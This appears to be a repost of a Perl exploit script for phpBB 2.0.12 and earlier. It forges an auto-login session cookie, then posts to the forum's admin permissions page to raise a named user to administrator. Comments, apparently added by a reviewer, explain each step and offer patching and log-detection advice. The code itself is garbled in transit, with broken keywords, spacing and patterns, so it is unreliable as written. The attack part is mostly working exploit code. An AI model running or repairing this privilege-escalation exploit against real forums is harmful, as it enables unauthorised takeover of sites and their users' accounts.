phpBB <= 2.0.12 Change User Rights Authentication Bypass

xiaoxiao2021-03-06  18

#! / usr / bin / perl -w

# phpBB <= 2.0.12 Session Autologin Exploit

# This script uses the vulnerability in the autologinid variable

# More: http://www.phpbb.com/phpbb/viewtopic.php?f=14&t=267563

#

# Just gives a user on a vulnerable forum administrator rights.

# You should register the user before using this ;-)

# by kutas, kutas@mail15.com

# P.S. I don't know who wrote the original exploit, so I cannot place a (c) here ...

# But greets go to Painterist, who made an exploit for Firefox cookies ...

# NOTE(review): this listing was mangled in transit (capitalised keywords,
# spaces inside sigils and operators, the quoting operator reduced to "Q");
# it is not valid Perl as shown. Comments describe what the visible text
# indicates.
# Argument check: with fewer than three arguments the usage text below is
# printed and the script exits. Per the usage line the arguments are the
# site, the forum folder, a user name, and an optional proxy.
IF (@argv <3)

{

Print Q

USAGE: Perl Nenu.pl [Site] [PHPBB Folder] [UserName] [Proxy (optional)]

I.E. perl Nenu.pl www.site.com / forum / bigadmin 127.0.0.1:3128

);

EXIT;

}

# Setup: strict mode plus the HTTP client module (the module name on the
# second "Use" line is garbled in this copy).
Use strict;

Use lwp :: use of useage;

# Positional arguments: host, forum path, target user name, optional proxy.
MY $ host = $ argv [0];

MY $ PATH = $ Argv [1];

MY $ user = $ argv [2];

MY $ proxy = $ argv [3];

# Base URL of the forum: scheme, then host, then path.
MY $ request = "http: //";

$ request. = $ host;

$ Request. = $ PATH;

# HTTP client with a cookie jar attached, so the cookie planted below is
# sent with every later request.
Use http :: cookies;

MY $ Browser = LWP :: UseRagent-> new ();

MY $ cookie_jar = http :: cookies-> new ();

$ Browser-> cookie_jar ($ cookie_jar);

# Core of the bypass: before any request is sent, a hand-built
# phpbb2mysql_data cookie is placed in the jar. Its URL-encoded value is a
# serialized two-element array naming "autologinid" and "UserID" with the
# value 2. No password or login form appears anywhere in this script, so
# the forum's auto-login check is the only control being exercised.
# NOTE(review): user id 2 is presumably the first administrator account of
# a default install; confirm for the forum being assessed.
# Defensive reading: the fix belongs in the forum's session code (upgrade
# past 2.0.12). In request logs, look for this cookie name carrying an
# autologinid value that is not in the form the forum itself issues.
# The same source line also opens the optional-proxy branch.
$ cookie_jar-> set_cookie ("0", "phpbb2mysql_data", "A% 3A2% 3A% 7BS% 3A11% 3A% 22autologinid% 22% 3B% 3A1% 3BS% 3A6% 3A% 22UserID% 22% 3BS% 3A1% 3A % 222% 22% 3B% 7D "," / ", $ Host ,,,,); if (defined $ proxy) {

# Removes the scheme prefix from the proxy argument (pattern garbled here),
# then routes the client's HTTP traffic through that proxy.
$ proxy = ~ s / (http:) // EG;

$ Browser-> Proxy ("http", "http:// $ proxy");

}

# Probe: fetch the forum URL built earlier with the forged cookie in place,
# announcing the target (and the proxy, when one was given) first.
Print " / N";

Print "Trying to Connect to $ Host $ PATH"; if ($ proxy) {print "Using proxy $ proxy";

MY $ response = $ browser-> get ($ request);

# Any non-success HTTP status aborts the run with the status line.
Die "Error:", $ response-> status_line

Unless $ response-> is_success;

# Success test: a match on the marker below is taken as proof that the
# server treated the request as logged in; otherwise the script exits.
# NOTE(review): the marker text is garbled in this copy; presumably it
# matches page content only rendered for an authenticated user (confirm).
# For assessing one's own forum, comparing the installed version against
# 2.0.12 answers the same question without sending a forged cookie.
IF ($ response-> content = ~ m / phpbprivmsg /) {

Print "/ n forum is vulnerable !!! / n";

} else {

Print "sorry ... not vulnerable"; exit ();

# Pulls the session id out of the page fetched earlier and appends the
# admin user-permissions script (admin_ug_auth.php) with that sid to the URL.
# NOTE(review): the character class in the sid pattern is garbled in this copy.
Print " / NTRYING TO GET The USER: $ User ID ... / N";

$ response-> content = ~ / sID = ([/ w / d] *) /;

MY $ SID = $ 1;

$ Request. = "admin // admin_ug_auth.php? mode = user & sid = $ sID";

# First POST: submits the admin panel's user look-up form for the given
# user name. In web server logs, a POST to admin_ug_auth.php from a client
# that never posted to the login form is the signal worth alerting on.
$ response = $ browser-> POST

$ Request,

[

'Username' => $ USER,

'Mode' => 'Edit',

'Mode' => 'User',

'SubmitUser' => 'Look Up User'

],

);

# Any non-success HTTP status aborts the run with the status line.
Die "Error:", $ response-> status_line

Unless $ response-> is_success;

# The captured value of the "u" form field in the reply is kept as the
# user's id; when the field is absent the script reports that the user was
# not found and exits.
IF ($ response-> content = ~ / name = "u" value = "([/ d] *)" /)

{Print "DONE ... ID = 1 / n / N";} else {print "no user $ user found ..."; exit ();

MY $ uid = $ 1;

# Second POST to the same admin URL: submits the permissions form with
# userlevel set to "admin" for the user id captured from the look-up reply.
Print "Trying to Give User: $ User Admin Status ... / N";

$ response = $ browser-> POST

$ Request,

[

'userlevel' => 'admin',

'Mode' => 'User',

'ADV' => '',

'u' => $ uid,

'Submit' => 'Submit'

],

);

# Only the HTTP status is checked; the reply body is never inspected, so
# the closing message states an expectation, not a confirmed change.
# For responders: after patching, list the accounts that hold administrator
# level and remove any that were not granted deliberately, since a change
# made this way persists in the user table after the session ends.
Die "Error:", $ response-> status_line

Unless $ response-> is_success;

Print "Well Done !!! $ User Should Now Have An Admin Status ../ n ";
